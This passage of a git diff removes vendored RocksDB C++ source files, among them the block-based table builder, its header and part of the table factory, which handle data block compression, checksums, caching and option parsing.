-      // between the keys "the quick brown fox" and "the who".  We can use
-      // "the r" as the key for the index block entry since it is >= all
-      // entries in the first block and < all entries in subsequent
-      // blocks.
-      if (ok()) {
-        r->index_builder->AddIndexEntry(&r->last_key, &key, r->pending_handle);
-      }
-    }
-
-    // Note: PartitionedFilterBlockBuilder requires key being added to filter
-    // builder after being added to index builder.
-    if (r->filter_builder != nullptr) {
-      r->filter_builder->Add(ExtractUserKey(key));
-    }
-
-    r->last_key.assign(key.data(), key.size());
-    r->data_block.Add(key, value);
-    r->props.num_entries++;
-    r->props.raw_key_size += key.size();
-    r->props.raw_value_size += value.size();
-
-    r->index_builder->OnKeyAdded(key);
-    NotifyCollectTableCollectorsOnAdd(key, value, r->offset,
-                                      r->table_properties_collectors,
-                                      r->ioptions.info_log);
-
-  } else if (value_type == kTypeRangeDeletion) {
-    // TODO(wanning&andrewkr) add num_tomestone to table properties
-    r->range_del_block.Add(key, value);
-    ++r->props.num_entries;
-    r->props.raw_key_size += key.size();
-    r->props.raw_value_size += value.size();
-    NotifyCollectTableCollectorsOnAdd(key, value, r->offset,
-                                      r->table_properties_collectors,
-                                      r->ioptions.info_log);
-  } else {
-    assert(false);
-  }
-}
-
-void BlockBasedTableBuilder::Flush() {
-  Rep* r = rep_;
-  assert(!r->closed);
-  if (!ok()) return;
-  if (r->data_block.empty()) return;
-  WriteBlock(&r->data_block, &r->pending_handle, true /* is_data_block */);
-  if (r->filter_builder != nullptr) {
-    r->filter_builder->StartBlock(r->offset);
-  }
-  r->props.data_size = r->offset;
-  ++r->props.num_data_blocks;
-}
-
-void BlockBasedTableBuilder::WriteBlock(BlockBuilder* block,
-                                        BlockHandle* handle,
-                                        bool is_data_block) {
-  WriteBlock(block->Finish(), handle, is_data_block);
-  block->Reset();
-}
-
-void BlockBasedTableBuilder::WriteBlock(const Slice& raw_block_contents,
-                                        BlockHandle* handle,
-                                        bool is_data_block) {
-  // File format contains a sequence of blocks where each block has:
-  //    block_data: uint8[n]
-  //    type: uint8
-  //    crc: uint32
-  assert(ok());
-  Rep* r = rep_;
-
-  auto type = r->compression_type;
-  Slice block_contents;
-  bool abort_compression = false;
-
-  StopWatchNano timer(r->ioptions.env,
-    ShouldReportDetailedTime(r->ioptions.env, r->ioptions.statistics));
-
-  if (raw_block_contents.size() < kCompressionSizeLimit) {
-    Slice compression_dict;
-    if (is_data_block && r->compression_dict && r->compression_dict->size()) {
-      compression_dict = *r->compression_dict;
-    }
-
-    block_contents = CompressBlock(raw_block_contents, r->compression_opts,
-                                   &type, r->table_options.format_version,
-                                   compression_dict, &r->compressed_output);
-
-    // Some of the compression algorithms are known to be unreliable. If
-    // the verify_compression flag is set then try to de-compress the
-    // compressed data and compare to the input.
-    if (type != kNoCompression && r->table_options.verify_compression) {
-      // Retrieve the uncompressed contents into a new buffer
-      BlockContents contents;
-      Status stat = UncompressBlockContentsForCompressionType(
-          block_contents.data(), block_contents.size(), &contents,
-          r->table_options.format_version, compression_dict, type,
-          r->ioptions);
-
-      if (stat.ok()) {
-        bool compressed_ok = contents.data.compare(raw_block_contents) == 0;
-        if (!compressed_ok) {
-          // The result of the compression was invalid. abort.
-          abort_compression = true;
-          ROCKS_LOG_ERROR(r->ioptions.info_log,
-                          "Decompressed block did not match raw block");
-          r->status =
-              Status::Corruption("Decompressed block did not match raw block");
-        }
-      } else {
-        // Decompression reported an error. abort.
-        r->status = Status::Corruption("Could not decompress");
-        abort_compression = true;
-      }
-    }
-  } else {
-    // Block is too big to be compressed.
-    abort_compression = true;
-  }
-
-  // Abort compression if the block is too big, or did not pass
-  // verification.
-  if (abort_compression) {
-    RecordTick(r->ioptions.statistics, NUMBER_BLOCK_NOT_COMPRESSED);
-    type = kNoCompression;
-    block_contents = raw_block_contents;
-  } else if (type != kNoCompression &&
-             ShouldReportDetailedTime(r->ioptions.env,
-                                      r->ioptions.statistics)) {
-    MeasureTime(r->ioptions.statistics, COMPRESSION_TIMES_NANOS,
-                timer.ElapsedNanos());
-    MeasureTime(r->ioptions.statistics, BYTES_COMPRESSED,
-                raw_block_contents.size());
-    RecordTick(r->ioptions.statistics, NUMBER_BLOCK_COMPRESSED);
-  }
-
-  WriteRawBlock(block_contents, type, handle);
-  r->compressed_output.clear();
-}
-
-void BlockBasedTableBuilder::WriteRawBlock(const Slice& block_contents,
-                                           CompressionType type,
-                                           BlockHandle* handle) {
-  Rep* r = rep_;
-  StopWatch sw(r->ioptions.env, r->ioptions.statistics, WRITE_RAW_BLOCK_MICROS);
-  handle->set_offset(r->offset);
-  handle->set_size(block_contents.size());
-  assert(r->status.ok());
-  r->status = r->file->Append(block_contents);
-  if (r->status.ok()) {
-    char trailer[kBlockTrailerSize];
-    trailer[0] = type;
-    char* trailer_without_type = trailer + 1;
-    switch (r->table_options.checksum) {
-      case kNoChecksum:
-        EncodeFixed32(trailer_without_type, 0);
-        break;
-      case kCRC32c: {
-        auto crc = crc32c::Value(block_contents.data(), block_contents.size());
-        crc = crc32c::Extend(crc, trailer, 1);  // Extend to cover block type
-        EncodeFixed32(trailer_without_type, crc32c::Mask(crc));
-        break;
-      }
-      case kxxHash: {
-        void* xxh = XXH32_init(0);
-        XXH32_update(xxh, block_contents.data(),
-                     static_cast<uint32_t>(block_contents.size()));
-        XXH32_update(xxh, trailer, 1);  // Extend  to cover block type
-        EncodeFixed32(trailer_without_type, XXH32_digest(xxh));
-        break;
-      }
-    }
-
-    assert(r->status.ok());
-    r->status = r->file->Append(Slice(trailer, kBlockTrailerSize));
-    if (r->status.ok()) {
-      r->status = InsertBlockInCache(block_contents, type, handle);
-    }
-    if (r->status.ok()) {
-      r->offset += block_contents.size() + kBlockTrailerSize;
-    }
-  }
-}
-
-Status BlockBasedTableBuilder::status() const {
-  return rep_->status;
-}
-
-static void DeleteCachedBlock(const Slice& key, void* value) {
-  Block* block = reinterpret_cast<Block*>(value);
-  delete block;
-}
-
-//
-// Make a copy of the block contents and insert into compressed block cache
-//
-Status BlockBasedTableBuilder::InsertBlockInCache(const Slice& block_contents,
-                                                  const CompressionType type,
-                                                  const BlockHandle* handle) {
-  Rep* r = rep_;
-  Cache* block_cache_compressed = r->table_options.block_cache_compressed.get();
-
-  if (type != kNoCompression && block_cache_compressed != nullptr) {
-
-    size_t size = block_contents.size();
-
-    std::unique_ptr<char[]> ubuf(new char[size + 1]);
-    memcpy(ubuf.get(), block_contents.data(), size);
-    ubuf[size] = type;
-
-    BlockContents results(std::move(ubuf), size, true, type);
-
-    Block* block = new Block(std::move(results), kDisableGlobalSequenceNumber);
-
-    // make cache key by appending the file offset to the cache prefix id
-    char* end = EncodeVarint64(
-                  r->compressed_cache_key_prefix +
-                  r->compressed_cache_key_prefix_size,
-                  handle->offset());
-    Slice key(r->compressed_cache_key_prefix, static_cast<size_t>
-              (end - r->compressed_cache_key_prefix));
-
-    // Insert into compressed block cache.
-    block_cache_compressed->Insert(key, block, block->usable_size(),
-                                   &DeleteCachedBlock);
-
-    // Invalidate OS cache.
-    r->file->InvalidateCache(static_cast<size_t>(r->offset), size);
-  }
-  return Status::OK();
-}
-
-Status BlockBasedTableBuilder::Finish() {
-  Rep* r = rep_;
-  bool empty_data_block = r->data_block.empty();
-  Flush();
-  assert(!r->closed);
-  r->closed = true;
-
-  // To make sure properties block is able to keep the accurate size of index
-  // block, we will finish writing all index entries here and flush them
-  // to storage after metaindex block is written.
-  if (ok() && !empty_data_block) {
-    r->index_builder->AddIndexEntry(
-        &r->last_key, nullptr /* no next data block */, r->pending_handle);
-  }
-
-  BlockHandle filter_block_handle, metaindex_block_handle, index_block_handle,
-      compression_dict_block_handle, range_del_block_handle;
-  // Write filter block
-  if (ok() && r->filter_builder != nullptr) {
-    Status s = Status::Incomplete();
-    while (s.IsIncomplete()) {
-      Slice filter_content = r->filter_builder->Finish(filter_block_handle, &s);
-      assert(s.ok() || s.IsIncomplete());
-      r->props.filter_size += filter_content.size();
-      WriteRawBlock(filter_content, kNoCompression, &filter_block_handle);
-    }
-  }
-
-  IndexBuilder::IndexBlocks index_blocks;
-  auto index_builder_status = r->index_builder->Finish(&index_blocks);
-  if (index_builder_status.IsIncomplete()) {
-    // We we have more than one index partition then meta_blocks are not
-    // supported for the index. Currently meta_blocks are used only by
-    // HashIndexBuilder which is not multi-partition.
-    assert(index_blocks.meta_blocks.empty());
-  } else if (!index_builder_status.ok()) {
-    return index_builder_status;
-  }
-
-  // Write meta blocks and metaindex block with the following order.
-  //    1. [meta block: filter]
-  //    2. [meta block: properties]
-  //    3. [meta block: compression dictionary]
-  //    4. [meta block: range deletion tombstone]
-  //    5. [metaindex block]
-  // write meta blocks
-  MetaIndexBuilder meta_index_builder;
-  for (const auto& item : index_blocks.meta_blocks) {
-    BlockHandle block_handle;
-    WriteBlock(item.second, &block_handle, false /* is_data_block */);
-    meta_index_builder.Add(item.first, block_handle);
-  }
-
-  if (ok()) {
-    if (r->filter_builder != nullptr) {
-      // Add mapping from "<filter_block_prefix>.Name" to location
-      // of filter data.
-      std::string key;
-      if (r->filter_builder->IsBlockBased()) {
-        key = BlockBasedTable::kFilterBlockPrefix;
-      } else {
-        key = r->table_options.partition_filters
-                  ? BlockBasedTable::kPartitionedFilterBlockPrefix
-                  : BlockBasedTable::kFullFilterBlockPrefix;
-      }
-      key.append(r->table_options.filter_policy->Name());
-      meta_index_builder.Add(key, filter_block_handle);
-    }
-
-    // Write properties and compression dictionary blocks.
-    {
-      PropertyBlockBuilder property_block_builder;
-      r->props.column_family_id = r->column_family_id;
-      r->props.column_family_name = r->column_family_name;
-      r->props.filter_policy_name = r->table_options.filter_policy != nullptr ?
-          r->table_options.filter_policy->Name() : "";
-      r->props.index_size =
-          r->index_builder->EstimatedSize() + kBlockTrailerSize;
-      r->props.comparator_name = r->ioptions.user_comparator != nullptr
-                                     ? r->ioptions.user_comparator->Name()
-                                     : "nullptr";
-      r->props.merge_operator_name = r->ioptions.merge_operator != nullptr
-                                         ? r->ioptions.merge_operator->Name()
-                                         : "nullptr";
-      r->props.compression_name = CompressionTypeToString(r->compression_type);
-      r->props.prefix_extractor_name =
-          r->ioptions.prefix_extractor != nullptr
-              ? r->ioptions.prefix_extractor->Name()
-              : "nullptr";
-
-      std::string property_collectors_names = "[";
-      property_collectors_names = "[";
-      for (size_t i = 0;
-           i < r->ioptions.table_properties_collector_factories.size(); ++i) {
-        if (i != 0) {
-          property_collectors_names += ",";
-        }
-        property_collectors_names +=
-            r->ioptions.table_properties_collector_factories[i]->Name();
-      }
-      property_collectors_names += "]";
-      r->props.property_collectors_names = property_collectors_names;
-      if (r->table_options.index_type ==
-          BlockBasedTableOptions::kTwoLevelIndexSearch) {
-        assert(r->p_index_builder_ != nullptr);
-        r->props.index_partitions = r->p_index_builder_->NumPartitions();
-        r->props.top_level_index_size =
-            r->p_index_builder_->EstimateTopLevelIndexSize(r->offset);
-      }
-      r->props.creation_time = r->creation_time;
-      r->props.oldest_key_time = r->oldest_key_time;
-
-      // Add basic properties
-      property_block_builder.AddTableProperty(r->props);
-
-      // Add use collected properties
-      NotifyCollectTableCollectorsOnFinish(r->table_properties_collectors,
-                                           r->ioptions.info_log,
-                                           &property_block_builder);
-
-      BlockHandle properties_block_handle;
-      WriteRawBlock(
-          property_block_builder.Finish(),
-          kNoCompression,
-          &properties_block_handle
-      );
-      meta_index_builder.Add(kPropertiesBlock, properties_block_handle);
-
-      // Write compression dictionary block
-      if (r->compression_dict && r->compression_dict->size()) {
-        WriteRawBlock(*r->compression_dict, kNoCompression,
-                      &compression_dict_block_handle);
-        meta_index_builder.Add(kCompressionDictBlock,
-                               compression_dict_block_handle);
-      }
-    }  // end of properties/compression dictionary block writing
-
-    if (ok() && !r->range_del_block.empty()) {
-      WriteRawBlock(r->range_del_block.Finish(), kNoCompression,
-                    &range_del_block_handle);
-      meta_index_builder.Add(kRangeDelBlock, range_del_block_handle);
-    }  // range deletion tombstone meta block
-  }    // meta blocks
-
-  // Write index block
-  if (ok()) {
-    // flush the meta index block
-    WriteRawBlock(meta_index_builder.Finish(), kNoCompression,
-                  &metaindex_block_handle);
-
-    const bool is_data_block = true;
-    WriteBlock(index_blocks.index_block_contents, &index_block_handle,
-               !is_data_block);
-    // If there are more index partitions, finish them and write them out
-    Status& s = index_builder_status;
-    while (s.IsIncomplete()) {
-      s = r->index_builder->Finish(&index_blocks, index_block_handle);
-      if (!s.ok() && !s.IsIncomplete()) {
-        return s;
-      }
-      WriteBlock(index_blocks.index_block_contents, &index_block_handle,
-                 !is_data_block);
-      // The last index_block_handle will be for the partition index block
-    }
-  }
-
-  // Write footer
-  if (ok()) {
-    // No need to write out new footer if we're using default checksum.
-    // We're writing legacy magic number because we want old versions of RocksDB
-    // be able to read files generated with new release (just in case if
-    // somebody wants to roll back after an upgrade)
-    // TODO(icanadi) at some point in the future, when we're absolutely sure
-    // nobody will roll back to RocksDB 2.x versions, retire the legacy magic
-    // number and always write new table files with new magic number
-    bool legacy = (r->table_options.format_version == 0);
-    // this is guaranteed by BlockBasedTableBuilder's constructor
-    assert(r->table_options.checksum == kCRC32c ||
-           r->table_options.format_version != 0);
-    Footer footer(legacy ? kLegacyBlockBasedTableMagicNumber
-                         : kBlockBasedTableMagicNumber,
-                  r->table_options.format_version);
-    footer.set_metaindex_handle(metaindex_block_handle);
-    footer.set_index_handle(index_block_handle);
-    footer.set_checksum(r->table_options.checksum);
-    std::string footer_encoding;
-    footer.EncodeTo(&footer_encoding);
-    assert(r->status.ok());
-    r->status = r->file->Append(footer_encoding);
-    if (r->status.ok()) {
-      r->offset += footer_encoding.size();
-    }
-  }
-
-  return r->status;
-}
-
-void BlockBasedTableBuilder::Abandon() {
-  Rep* r = rep_;
-  assert(!r->closed);
-  r->closed = true;
-}
-
-uint64_t BlockBasedTableBuilder::NumEntries() const {
-  return rep_->props.num_entries;
-}
-
-uint64_t BlockBasedTableBuilder::FileSize() const {
-  return rep_->offset;
-}
-
-bool BlockBasedTableBuilder::NeedCompact() const {
-  for (const auto& collector : rep_->table_properties_collectors) {
-    if (collector->NeedCompact()) {
-      return true;
-    }
-  }
-  return false;
-}
-
-TableProperties BlockBasedTableBuilder::GetTableProperties() const {
-  TableProperties ret = rep_->props;
-  for (const auto& collector : rep_->table_properties_collectors) {
-    for (const auto& prop : collector->GetReadableProperties()) {
-      ret.readable_properties.insert(prop);
-    }
-    collector->Finish(&ret.user_collected_properties);
-  }
-  return ret;
-}
-
-const std::string BlockBasedTable::kFilterBlockPrefix = "filter.";
-const std::string BlockBasedTable::kFullFilterBlockPrefix = "fullfilter.";
-const std::string BlockBasedTable::kPartitionedFilterBlockPrefix =
-    "partitionedfilter.";
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_builder.h b/thirdparty/rocksdb/table/block_based_table_builder.h
deleted file mode 100644
index 36dfce1..0000000
--- a/thirdparty/rocksdb/table/block_based_table_builder.h
+++ /dev/null
@@ -1,129 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include <stdint.h>
-#include <limits>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "rocksdb/flush_block_policy.h"
-#include "rocksdb/listener.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "table/table_builder.h"
-
-namespace rocksdb {
-
-class BlockBuilder;
-class BlockHandle;
-class WritableFile;
-struct BlockBasedTableOptions;
-
-extern const uint64_t kBlockBasedTableMagicNumber;
-extern const uint64_t kLegacyBlockBasedTableMagicNumber;
-
-class BlockBasedTableBuilder : public TableBuilder {
- public:
-  // Create a builder that will store the contents of the table it is
-  // building in *file.  Does not close the file.  It is up to the
-  // caller to close the file after calling Finish().
-  // @param compression_dict Data for presetting the compression library's
-  //    dictionary, or nullptr.
-  BlockBasedTableBuilder(
-      const ImmutableCFOptions& ioptions,
-      const BlockBasedTableOptions& table_options,
-      const InternalKeyComparator& internal_comparator,
-      const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-          int_tbl_prop_collector_factories,
-      uint32_t column_family_id, WritableFileWriter* file,
-      const CompressionType compression_type,
-      const CompressionOptions& compression_opts,
-      const std::string* compression_dict, const bool skip_filters,
-      const std::string& column_family_name, const uint64_t creation_time = 0,
-      const uint64_t oldest_key_time = 0);
-
-  // REQUIRES: Either Finish() or Abandon() has been called.
-  ~BlockBasedTableBuilder();
-
-  // Add key,value to the table being constructed.
-  // REQUIRES: key is after any previously added key according to comparator.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Add(const Slice& key, const Slice& value) override;
-
-  // Return non-ok iff some error has been detected.
-  Status status() const override;
-
-  // Finish building the table.  Stops using the file passed to the
-  // constructor after this function returns.
-  // REQUIRES: Finish(), Abandon() have not been called
-  Status Finish() override;
-
-  // Indicate that the contents of this builder should be abandoned.  Stops
-  // using the file passed to the constructor after this function returns.
-  // If the caller is not going to call Finish(), it must call Abandon()
-  // before destroying this builder.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Abandon() override;
-
-  // Number of calls to Add() so far.
-  uint64_t NumEntries() const override;
-
-  // Size of the file generated so far.  If invoked after a successful
-  // Finish() call, returns the size of the final generated file.
-  uint64_t FileSize() const override;
-
-  bool NeedCompact() const override;
-
-  // Get table properties
-  TableProperties GetTableProperties() const override;
-
- private:
-  bool ok() const { return status().ok(); }
-
-  // Call block's Finish() method
-  // and then write the compressed block contents to file.
-  void WriteBlock(BlockBuilder* block, BlockHandle* handle, bool is_data_block);
-
-  // Compress and write block content to the file.
-  void WriteBlock(const Slice& block_contents, BlockHandle* handle,
-                  bool is_data_block);
-  // Directly write data to the file.
-  void WriteRawBlock(const Slice& data, CompressionType, BlockHandle* handle);
-  Status InsertBlockInCache(const Slice& block_contents,
-                            const CompressionType type,
-                            const BlockHandle* handle);
-  struct Rep;
-  class BlockBasedTablePropertiesCollectorFactory;
-  class BlockBasedTablePropertiesCollector;
-  Rep* rep_;
-
-  // Advanced operation: flush any buffered key/value pairs to file.
-  // Can be used to ensure that two adjacent entries never live in
-  // the same data block.  Most clients should not need to use this method.
-  // REQUIRES: Finish(), Abandon() have not been called
-  void Flush();
-
-  // Some compression libraries fail when the raw size is bigger than int. If
-  // uncompressed size is bigger than kCompressionSizeLimit, don't compress it
-  const uint64_t kCompressionSizeLimit = std::numeric_limits<int>::max();
-
-  // No copying allowed
-  BlockBasedTableBuilder(const BlockBasedTableBuilder&) = delete;
-  void operator=(const BlockBasedTableBuilder&) = delete;
-};
-
-Slice CompressBlock(const Slice& raw,
-                    const CompressionOptions& compression_options,
-                    CompressionType* type, uint32_t format_version,
-                    const Slice& compression_dict,
-                    std::string* compressed_output);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/block_based_table_factory.cc b/thirdparty/rocksdb/table/block_based_table_factory.cc
deleted file mode 100644
index 0c6bbbc..0000000
--- a/thirdparty/rocksdb/table/block_based_table_factory.cc
+++ /dev/null
@@ -1,417 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/block_based_table_factory.h"
-
-#include <memory>
-#include <string>
-#include <stdint.h>
-
-#include "options/options_helper.h"
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/flush_block_policy.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_reader.h"
-#include "table/format.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-BlockBasedTableFactory::BlockBasedTableFactory(
-    const BlockBasedTableOptions& _table_options)
-    : table_options_(_table_options) {
-  if (table_options_.flush_block_policy_factory == nullptr) {
-    table_options_.flush_block_policy_factory.reset(
-        new FlushBlockBySizePolicyFactory());
-  }
-  if (table_options_.no_block_cache) {
-    table_options_.block_cache.reset();
-  } else if (table_options_.block_cache == nullptr) {
-    table_options_.block_cache = NewLRUCache(8 << 20);
-  }
-  if (table_options_.block_size_deviation < 0 ||
-      table_options_.block_size_deviation > 100) {
-    table_options_.block_size_deviation = 0;
-  }
-  if (table_options_.block_restart_interval < 1) {
-    table_options_.block_restart_interval = 1;
-  }
-  if (table_options_.index_block_restart_interval < 1) {
-    table_options_.index_block_restart_interval = 1;
-  }
-  if (table_options_.partition_filters &&
-      table_options_.index_type !=
-          BlockBasedTableOptions::kTwoLevelIndexSearch) {
-    // We do not support partitioned filters without partitioning indexes
-    table_options_.partition_filters = false;
-  }
-}
-
-Status BlockBasedTableFactory::NewTableReader(
-    const TableReaderOptions& table_reader_options,
-    unique_ptr<RandomAccessFileReader>&& file, uint64_t file_size,
-    unique_ptr<TableReader>* table_reader,
-    bool prefetch_index_and_filter_in_cache) const {
-  return BlockBasedTable::Open(
-      table_reader_options.ioptions, table_reader_options.env_options,
-      table_options_, table_reader_options.internal_comparator, std::move(file),
-      file_size, table_reader, prefetch_index_and_filter_in_cache,
-      table_reader_options.skip_filters, table_reader_options.level);
-}
-
-TableBuilder* BlockBasedTableFactory::NewTableBuilder(
-    const TableBuilderOptions& table_builder_options, uint32_t column_family_id,
-    WritableFileWriter* file) const {
-  auto table_builder = new BlockBasedTableBuilder(
-      table_builder_options.ioptions, table_options_,
-      table_builder_options.internal_comparator,
-      table_builder_options.int_tbl_prop_collector_factories, column_family_id,
-      file, table_builder_options.compression_type,
-      table_builder_options.compression_opts,
-      table_builder_options.compression_dict,
-      table_builder_options.skip_filters,
-      table_builder_options.column_family_name,
-      table_builder_options.creation_time,
-      table_builder_options.oldest_key_time);
-
-  return table_builder;
-}
-
-Status BlockBasedTableFactory::SanitizeOptions(
-    const DBOptions& db_opts,
-    const ColumnFamilyOptions& cf_opts) const {
-  if (table_options_.index_type == BlockBasedTableOptions::kHashSearch &&
-      cf_opts.prefix_extractor == nullptr) {
-    return Status::InvalidArgument("Hash index is specified for block-based "
-        "table, but prefix_extractor is not given");
-  }
-  if (table_options_.cache_index_and_filter_blocks &&
-      table_options_.no_block_cache) {
-    return Status::InvalidArgument("Enable cache_index_and_filter_blocks, "
-        ", but block cache is disabled");
-  }
-  if (table_options_.pin_l0_filter_and_index_blocks_in_cache &&
-      table_options_.no_block_cache) {
-    return Status::InvalidArgument(
-        "Enable pin_l0_filter_and_index_blocks_in_cache, "
-        ", but block cache is disabled");
-  }
-  if (!BlockBasedTableSupportedVersion(table_options_.format_version)) {
-    return Status::InvalidArgument(
-        "Unsupported BlockBasedTable format_version. Please check "
-        "include/rocksdb/table.h for more info");
-  }
-  return Status::OK();
-}
-
-std::string BlockBasedTableFactory::GetPrintableTableOptions() const {
-  std::string ret;
-  ret.reserve(20000);
-  const int kBufferSize = 200;
-  char buffer[kBufferSize];
-
-  snprintf(buffer, kBufferSize, "  flush_block_policy_factory: %s (%p)\n",
-           table_options_.flush_block_policy_factory->Name(),
-           static_cast<void*>(table_options_.flush_block_policy_factory.get()));
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  cache_index_and_filter_blocks: %d\n",
-           table_options_.cache_index_and_filter_blocks);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize,
-           "  cache_index_and_filter_blocks_with_high_priority: %d\n",
-           table_options_.cache_index_and_filter_blocks_with_high_priority);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize,
-           "  pin_l0_filter_and_index_blocks_in_cache: %d\n",
-           table_options_.pin_l0_filter_and_index_blocks_in_cache);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  index_type: %d\n",
-           table_options_.index_type);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  hash_index_allow_collision: %d\n",
-           table_options_.hash_index_allow_collision);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  checksum: %d\n",
-           table_options_.checksum);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  no_block_cache: %d\n",
-           table_options_.no_block_cache);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  block_cache: %p\n",
-           static_cast<void*>(table_options_.block_cache.get()));
-  ret.append(buffer);
-  if (table_options_.block_cache) {
-    const char* block_cache_name = table_options_.block_cache->Name();
-    if (block_cache_name != nullptr) {
-      snprintf(buffer, kBufferSize, "  block_cache_name: %s\n",
-               block_cache_name);
-      ret.append(buffer);
-    }
-    ret.append("  block_cache_options:\n");
-    ret.append(table_options_.block_cache->GetPrintableOptions());
-  }
-  snprintf(buffer, kBufferSize, "  block_cache_compressed: %p\n",
-           static_cast<void*>(table_options_.block_cache_compressed.get()));
-  ret.append(buffer);
-  if (table_options_.block_cache_compressed) {
-    const char* block_cache_compressed_name =
-        table_options_.block_cache_compressed->Name();
-    if (block_cache_compressed_name != nullptr) {
-      snprintf(buffer, kBufferSize, "  block_cache_name: %s\n",
-               block_cache_compressed_name);
-      ret.append(buffer);
-    }
-    ret.append("  block_cache_compressed_options:\n");
-    ret.append(table_options_.block_cache_compressed->GetPrintableOptions());
-  }
-  snprintf(buffer, kBufferSize, "  persistent_cache: %p\n",
-           static_cast<void*>(table_options_.persistent_cache.get()));
-  ret.append(buffer);
-  if (table_options_.persistent_cache) {
-    snprintf(buffer, kBufferSize, "  persistent_cache_options:\n");
-    ret.append(buffer);
-    ret.append(table_options_.persistent_cache->GetPrintableOptions());
-  }
-  snprintf(buffer, kBufferSize, "  block_size: %" ROCKSDB_PRIszt "\n",
-           table_options_.block_size);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  block_size_deviation: %d\n",
-           table_options_.block_size_deviation);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  block_restart_interval: %d\n",
-           table_options_.block_restart_interval);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  index_block_restart_interval: %d\n",
-           table_options_.index_block_restart_interval);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  filter_policy: %s\n",
-           table_options_.filter_policy == nullptr ?
-             "nullptr" : table_options_.filter_policy->Name());
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  whole_key_filtering: %d\n",
-           table_options_.whole_key_filtering);
-  ret.append(buffer);
-  snprintf(buffer, kBufferSize, "  format_version: %d\n",
-           table_options_.format_version);
-  ret.append(buffer);
-  return ret;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-bool SerializeSingleBlockBasedTableOption(
-    std::string* opt_string, const BlockBasedTableOptions& bbt_options,
-    const std::string& name, const std::string& delimiter) {
-  auto iter = block_based_table_type_info.find(name);
-  if (iter == block_based_table_type_info.end()) {
-    return false;
-  }
-  auto& opt_info = iter->second;
-  const char* opt_address =
-      reinterpret_cast<const char*>(&bbt_options) + opt_info.offset;
-  std::string value;
-  bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value);
-  if (result) {
-    *opt_string = name + "=" + value + delimiter;
-  }
-  return result;
-}
-}  // namespace
-
-Status BlockBasedTableFactory::GetOptionString(
-    std::string* opt_string, const std::string& delimiter) const {
-  assert(opt_string);
-  opt_string->clear();
-  for (auto iter = block_based_table_type_info.begin();
-       iter != block_based_table_type_info.end(); ++iter) {
-    if (iter->second.verification == OptionVerificationType::kDeprecated) {
-      // If the option is no longer used in rocksdb and marked as deprecated,
-      // we skip it in the serialization.
-      continue;
-    }
-    std::string single_output;
-    bool result = SerializeSingleBlockBasedTableOption(
-        &single_output, table_options_, iter->first, delimiter);
-    assert(result);
-    if (result) {
-      opt_string->append(single_output);
-    }
-  }
-  return Status::OK();
-}
-#else
-Status BlockBasedTableFactory::GetOptionString(
-    std::string* opt_string, const std::string& delimiter) const {
-  return Status::OK();
-}
-#endif  // !ROCKSDB_LITE
-
-const BlockBasedTableOptions& BlockBasedTableFactory::table_options() const {
-  return table_options_;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-std::string ParseBlockBasedTableOption(const std::string& name,
-                                       const std::string& org_value,
-                                       BlockBasedTableOptions* new_options,
-                                       bool input_strings_escaped = false,
-                                       bool ignore_unknown_options = false) {
-  const std::string& value =
-      input_strings_escaped ? UnescapeOptionString(org_value) : org_value;
-  if (!input_strings_escaped) {
-    // if the input string is not escaped, it means this function is
-    // invoked from SetOptions, which takes the old format.
-    if (name == "block_cache") {
-      new_options->block_cache = NewLRUCache(ParseSizeT(value));
-      return "";
-    } else if (name == "block_cache_compressed") {
-      new_options->block_cache_compressed = NewLRUCache(ParseSizeT(value));
-      return "";
-    } else if (name == "filter_policy") {
-      // Expect the following format
-      // bloomfilter:int:bool
-      const std::string kName = "bloomfilter:";
-      if (value.compare(0, kName.size(), kName) != 0) {
-        return "Invalid filter policy name";
-      }
-      size_t pos = value.find(':', kName.size());
-      if (pos == std::string::npos) {
-        return "Invalid filter policy config, missing bits_per_key";
-      }
-      int bits_per_key =
-          ParseInt(trim(value.substr(kName.size(), pos - kName.size())));
-      bool use_block_based_builder =
-          ParseBoolean("use_block_based_builder", trim(value.substr(pos + 1)));
-      new_options->filter_policy.reset(
-          NewBloomFilterPolicy(bits_per_key, use_block_based_builder));
-      return "";
-    }
-  }
-  const auto iter = block_based_table_type_info.find(name);
-  if (iter == block_based_table_type_info.end()) {
-    if (ignore_unknown_options) {
-      return "";
-    } else {
-      return "Unrecognized option";
-    }
-  }
